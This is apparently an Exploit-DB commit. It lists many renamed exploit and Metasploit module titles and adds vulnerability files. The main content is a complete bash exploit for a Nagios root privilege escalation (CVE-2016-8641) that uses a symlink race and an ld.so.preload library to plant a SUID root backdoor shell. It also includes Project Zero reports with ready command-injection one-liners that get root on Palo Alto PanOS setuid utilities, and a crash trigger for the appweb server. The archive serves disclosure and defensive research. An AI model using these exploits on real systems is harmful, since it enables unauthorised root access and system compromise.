Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (Metasploit)
Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)

Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (Metasploit)
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)

Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit)
Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) (Metasploit)
Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (Metasploit)
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (Metasploit)
Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit)
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)
Microsoft Help Center - Cross-Site Scripting / Command Execution (Metasploit)
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (Metasploit)
Microsoft Help Center - Cross-Site Scripting / Command Execution (MS10-042) (Metasploit)
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)

Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (Metasploit)
Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)

Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (Metasploit)
Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)

Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)
Microsoft Internet Explorer - COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit)

Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)

Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)
Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (MS10-018) (Metasploit)

Microsoft Windows - Shell LNK Code Execution (Metasploit)
Microsoft Windows - Shell LNK Code Execution (MS10-046) (Metasploit)

Microsoft Internet Explorer - createTextRange() Code Execution (Metasploit)
Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit)

Microsoft Internet Explorer - Object Type (MS03-020)
Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)

Microsoft Internet Explorer - Data Binding Memory Corruption (Metasploit)
Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)

Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (Metasploit)
Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018) (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (1)
Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)
Microsoft Internet Explorer - (VML) Fill Method Code Execution (MS06-055) (Metasploit)

Microsoft Internet Explorer - 'Aurora' Memory Corruption (Metasploit)
Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)

Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (Metasploit)
Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)

CCProxy 6.2 - Telnet Proxy Ping Overflow (2) (Metasploit)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
Outlook - ATTACH_BY_REF_RESOLVE File Execution (Metasploit)
Outlook - ATTACH_BY_REF_ONLY File Execution (Metasploit)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)
Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit)
Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit)

Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)
Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)

FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)
FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) (Metasploit)

httpdx - tolog() Function Format String (1)
httpdx - tolog() Function Format String (Metasploit) (1)

Microsoft IIS FTP Server - NLST Response Overflow (Metasploit)
Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)
Microsoft Message Queueing Service - Path Overflow (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)
Microsoft RPC DCOM Interface - Overflow Exploit (Metasploit)
Microsoft Message Queueing Service - DNS Name Path Overflow (Metasploit)
Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit)
Microsoft RPC DCOM Interface - Overflow Exploit (MS03-026) (Metasploit)
Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)

IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)
IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (2)

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)
Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)

httpdx - tolog() Function Format String (2)
httpdx - tolog() Function Format String (Metasploit) (2)

Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)

NetSupport Manager Agent - Remote Buffer Overflow (2)
NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)

Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)
Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)

Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)
Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (Metasploit) (2)

SquirrelMail PGP Plugin - Command Execution (SMTP)
SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)

ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit)

Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2)
Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (2)

Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050)
Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit)

Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)
Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)

Mozilla Firefox - 'nsTreeRange' Dangling Pointer (1)
Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1)
Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)

Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)
Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)

ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)
ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)

Mozilla Firefox - Array.reduceRight() Integer Overflow (2)
Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)

Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (Metasploit)
Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2)
Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)

Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)
Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)

Sun Java Web Start Plugin - Command Line Argument Injection (2012)
Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)

Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)
Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)

Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)
Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)

quickshare file share 1.2.1 - Directory Traversal (2)
quickshare file share 1.2.1 - Directory Traversal (Metasploit) (2)

Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (Metasploit)
Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)

Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)
Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit)
ComSndFTP 1.3.7 Beta - USER Format String (Write4)
Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (Metasploit)
ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)
Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)

Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL redirection
Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)

Microsoft Office SharePoint Server 2007 - Remote Code Execution (Metasploit)
Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)

Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal
Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)

Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (Metasploit)
Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)

Microsoft Internet Explorer 5.5 - Index.dat
Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)

Microsoft Visual Studio RAD Support - Buffer Overflow (Metasploit)
Microsoft Visual Studio RAD Support - Buffer Overflow (MS03-051) (Metasploit)

JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)
JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)

Microsoft Internet Explorer 5 - Zone Spoofing
Microsoft Internet Explorer 5 - Zone Spoofing (MS01-055)

HP SiteScope - Remote Code Execution (1)
HP SiteScope - Remote Code Execution (Metasploit) (1)

Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure
Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)

Metasploit Web UI - Diagnostic Console Command Execution
Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)

Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address
Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)

Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant
Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047)

Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)
Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit)

Microsoft Internet Explorer 5 - XML Page Object Type Validation
Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040)

Microsoft Windows XP/2000 - Messenger Service Buffer Overrun
Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)

Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass
Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)

Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy
Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)

Microsoft Internet Explorer - Option Element Use-After-Free (Metasploit)
Microsoft Internet Explorer - Option Element Use-After-Free (MS11-081) (Metasploit)

Java Applet JMX - Remote Code Execution (1)
Java Applet JMX - Remote Code Execution (Metasploit) (1)

myServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting
MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting

VMware OVF Tools - Format String (1)
VMware OVF Tools - Format String (Metasploit) (1)

VMware OVF Tools - Format String (2)
VMware OVF Tools - Format String (Metasploit) (2)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)
Java Applet JMX - Remote Code Execution (2)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)
Java Applet JMX - Remote Code Execution (Metasploit) (2)

Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code
Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code (MS04-038)

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)
Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)

phpMyAdmin - Authenticated Remote Code Execution via preg_replace()
phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit)

Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow
Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)

Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)

Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)
Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit)

D-Link Devices - Unauthenticated Remote Command Execution (2)
D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2)

D-Link Devices - Unauthenticated Remote Command Execution (1)
D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1)

Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)
Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)
Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055)
HP SiteScope - Remote Code Execution (2)
Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)
HP SiteScope - Remote Code Execution (Metasploit) (2)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (2)
Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)
Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)
Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)
Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)

Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)
Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)
Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)
Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)
Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit)
Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit)

Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)
Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) (Metasploit)

Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)
Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)

Microsoft Windows Media Center - MCL Exploit (MS15-100)
Microsoft Windows Media Center - MCL Exploit (MS15-100) (Metasploit)

Advantech Switch - Bash Environment Variable Code Injection (Shellshock)
Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)

Oracle BeeHive 2 - voice-servlet processEvaluation()
Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)

Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference
Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)

IPFire - Bash Environment Variable Injection (Shellshock)
IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)

Ruby on Rails - Dynamic Render File Upload / Remote Code Execution
Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)

FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow

Windows x64 - Reverse Shell TCP Shellcode (694 bytes)

phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)
phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)

PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2)
PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2) (Metasploit)
Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection
Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection
EditMe CMS - Cross-Site Request Forgery (Add New Admin)
This commit is contained in:
Offensive Security 2016-11-19 05:01:21 +00:00
parent b22e31535e
commit 8948e76c12
15 changed files with 2035 additions and 314 deletions

642
files.csv

File diff suppressed because it is too large Load diff

53
platforms/linux/dos/40790.txt Executable file
View file

@ -0,0 +1,53 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=908
Palo Alto Networks have published a fix for this issue: http://securityadvisories.paloaltonetworks.com/Home/Detail/68
PanOS uses a modified version of the appweb3 embedded webserver, it's used for
a variety of tasks and is enabled by default. I've noticed a bug in the core utility routine mprItoa:
char *mprItoa(char *buf, int size, int64 value, int radix);
https://embedthis.com/appweb/doc-3/ejs/api/mpr.html#mpr_8h_1c44ccf179c55dbbcf7aa04ba86090463
The size parameter is documented to be the size of the buffer at *buf, but if
the value exceeds that it will write one more byte than that as a nul
terminator.
Note that appweb3 has been EOL since 2012 and no longer receives security
updates and is not supported by the developer, so security maintenance is the
responsibility of Palo Alto Networks. It seems crazy to ship a EOL web server,
but whatever.
I've found an unauthenticated php script that an attacker call force to invoke
mprItoa() on a default installation at /unauth/php/errorPage.php, it can be
called like so:
/unauth/php/errorPage.php?code=1e16
This example should corrupt the stored GOT pointer, resulting in some
unexpected routine being called on the attacker-controlled MaResponse object,
and crashing with some heap corruption.
*** glibc detected *** /usr/local/bin/appweb3: double free or corruption (out): 0x08229e98 ***
======= Backtrace: =========
/lib/libc.so.6[0xf7ee8786]
/lib/libc.so.6(cfree+0x59)[0xf7ee8bb9]
/usr/local/bin/../lib/3p/libappweb3.so.1(maFillHeaders+0x128)[0xf7e64c58]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6793b]
/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueue+0x28)[0xf7e608f8]
/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueues+0x38)[0xf7e5f438]
/usr/local/bin/../lib/3p/libappweb3.so.1(maRunPipeline+0x37)[0xf7e5f497]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6346d]
/usr/local/bin/../lib/3p/libappweb3.so.1(maProcessReadEvent+0x27f)[0xf7e63e0f]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e5ad74]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e36afd]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e3607c]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e30c6f]
/usr/local/bin/../lib/3p/libappweb3.so.1(threadProcWrapper+0x36)[0xf7e31296]
/lib/libpthread.so.0[0xf6e9b6e1]
/lib/libc.so.6(clone+0x5e)[0xf7f52aee]
======= Memory map: ========
08048000-0804c000 rwxp 00000000 08:02 67709 /usr/local/bin/appweb3
0804c000-095e5000 rwxp 00000000 00:00 0 [heap]
f1c00000-f1cd0000 rwxp 00000000 00:00 0
etc.

192
platforms/linux/local/40774.sh Executable file
View file

@ -0,0 +1,192 @@
Affected Product: Nagios 4
Vulnerability Type: root privilege escalation
Fixed in Version: N/A
Vendor Website: https://www.nagios.com/
Software Link: : https://sourceforge.net/projects/nagios/files/latest/download?source=directory-featured
Affected Version: 4.2.2 and prior
Tested on: Ubuntu
Remote Exploitable: No
Reported to vendor: 8 november 2016
Disclosed to public:
Release mode: Responsible Disclosure
CVE-2016-8641 Nagios 4.2.2 - root privilege escalation
Credits: Vincent Malguy
Description (from wikipedia) :
Nagios /ˈnɑːɡiːoʊs/, now known as Nagios Core, is a free and open source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved.
********************* CVE-2016-8641 Nagios 4.2.2 - root privilege escalation *********************
Using official installation instruction at https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/4/en/quickstart-ubuntu.html,
nagios' user is create with a shell :
Create a new nagios user account and give it a password.
/usr/sbin/useradd -m -s /bin/bash nagios
leading to a entry in /etc/passwd like this "nagios:x:1001:1001::/home/nagios:/bin/bash"
This means that if someone has access to the nagios account, he can access any files own by nagios.
The Nagios startup script, run by root, is insecurely giving owner of file to nagios use :
(/etc/init.d/nagios: line 190)
touch $NagiosRunFile
chown $NagiosUser:$NagiosGroup $NagiosRunFile $NagiosVarDir/nagios.log $NagiosRetentionFile
If Nagios user symlink $NagiosRunFile to a file that he has no access to, at startup or reboot of the nagios daemon, the init script with give him ownership of the linked file.
Exploit :
#!/bin/bash -p
#
TARGETSERVICE="Nagios"
LOWUSER="nagios"
TARGETPATH="/usr/local/nagios/var/nagios.lock"
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/rootbackdoor"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $TARGETPATH
touch $TARGETPATH
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
cleanexit 0
}
#intro
echo -e "\033[94m \nNagios - Root Privilege Escalation PoC Exploit \nNagios-chowned.sh (ver. 1.0)\n\nCVE-2016-XXXX \n"
echo -e "Discovered by: Vincent Malguy\n Original exploit code borrow from Dawid Golunski http://legalhackers.com (Thanks!)\033[0m"
# Priv check
echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
id | grep -q ${LOWUSER}
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as ${LOWUSER} user! Exiting.\n"
exit 3
fi
echo -e "\n[+] Target ${LOWUSER} file set to $TARGETPATH "
# [ Active exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
//unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
exit 2
fi
# Symlink the log file to /etc
rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $TARGETPATH file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TARGETPATH`"
# Kill target service if possible
#echo -ne "\n[+] Killing ${TARGETSERVICE}...\n"
#killall ${TARGETSERVICE}
# Wait for target service startup to re-create target file
echo -ne "\n[+] Waiting for ${TARGETSERVICE} startup to re-create the ${TARGETPATH}...\n"
while :; do
# if target file can be recreated by target process (like logs files), we need to keep remove and link it
rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
rm -f $TARGETPATH
break;
fi
done
# /etc/ld.so.preload dir should be owned by our low priv controled user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] ${TARGETSERVICE} restarted. The /etc/ld.so.preload file got created with ${LOWUSER} privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
chmod 755 /etc/ld.so.preload
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo 2>/dev/null >/dev/null
# Check for the rootshell
ls -l $BACKDOORPATH
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mGot root! The ${TARGETSERVICE} server has been ch-OWNED !\033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi
# Execute the rootshell
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p
# Job done.
cleanexit 0

20
platforms/linux/local/40788.txt Executable file
View file

@ -0,0 +1,20 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:
$ ls -l /usr/local/bin/root_trace
-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace
As the environment is not scrubbed, you can just do something like this:
$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
This was fixed by PAN:
http://securityadvisories.paloaltonetworks.com/Home/Detail/67

44
platforms/linux/local/40789.txt Executable file
View file

@ -0,0 +1,44 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913
This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67
The root_reboot utility is setuid root, but performs multiple calls to system() with attacker controlled data, such as this one:
.text:0804870F C7 44 24 04 78+ mov dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "...
.text:08048717 89 04 24 mov [esp], eax ; char **
.text:0804871A E8 0D FE FF FF call _asprintf
.text:0804871F 8B 45 E8 mov eax, [ebp+new]
.text:08048722 85 C0 test eax, eax
.text:08048724 0F 84 B9 01 00+ jz loc_80488E3
.text:0804872A 89 04 24 mov [esp], eax ; command
.text:0804872D E8 9A FD FF FF call _system
Which is trying to do this:
if (setuid(0) < 0)
{
fprintf(stderr, "%s: Can't setuid to reboot system\n");
}
if (reason) {
asprintf(&new, "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 -m \"The system is shutting down due to %s.\"", reason);
system(new);
free(new);
}
This is trivially exploitable, for example:
$ ls -l /usr/local/bin/root_reboot
-rwsr-xr-x 1 root root 16275 Oct 17 2014 /usr/local/bin/root_reboot
$ root_reboot --restart '"; bash -i; echo "'
# id
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
Palo Alto pointed out that they had already fixed this bug in an update that I needed to apply:
https://securityadvisories.paloaltonetworks.com/Home/Detail/45
However, looking at the fix they had essentially just checked that each character in the "reason" parameter was alphanumeric or white space. This does not prevent exploitation, you can just do this:
$ env SHELLOPTS=xtrace PS4='$(id)' root_reboot --restart whatever
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

146
platforms/php/webapps/40776.txt Executable file
View file

@ -0,0 +1,146 @@
Document Title:
===============
EditMe CMS - CSRF Privilege Escalate Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1996
Release Date:
=============
2016-11-14
Vulnerability Laboratory ID (VL-ID):
====================================
1996
Common Vulnerability Scoring System:
====================================
2.8
Product & Service Introduction:
===============================
EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping,and Web CMS.
CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to lear.
(Copy of the Vendor Homepage: http://www.editme.com/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a csrf privilege escalate web vulnerability in the official EditMe content managament system.
Vulnerability Disclosure Timeline:
==================================
